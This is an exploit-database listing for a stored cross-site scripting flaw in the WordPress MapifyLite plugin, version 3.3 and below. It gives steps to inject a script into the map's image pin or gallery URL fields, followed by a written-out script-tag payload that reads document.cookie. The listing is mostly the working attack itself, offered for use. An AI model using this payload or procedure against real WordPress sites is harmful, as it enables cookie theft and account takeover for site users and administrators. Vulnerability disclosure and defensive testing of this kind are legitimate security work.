Exploit for WordPress MapifyLite 3.3 Cross Site Scripting

Name: Exploit for WordPress MapifyLite 3.3 Cross Site Scripting
Rating: 5 (138 reviews)

2021-03-24 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:161939
#Title : MapifyLite Wordpress Plugins Stored XSS Injection  
#Date : 24/03/2021  
#Author : Eagle Eye  
#Vendor Homepage : https://mapifypro.com/product/mapifylite/  
#Version Affected : 3.3 and below  
#Tested on : Google Chrome  
#XSS vulnerability from Map settings & locations  
  
#1. Login user  
#2. Go to add map settins/locations  
#3. Put XSS payload at image pin url / image gallery url  
  
#payload  
http://localhost/"><script>alert(document.cookie)</script>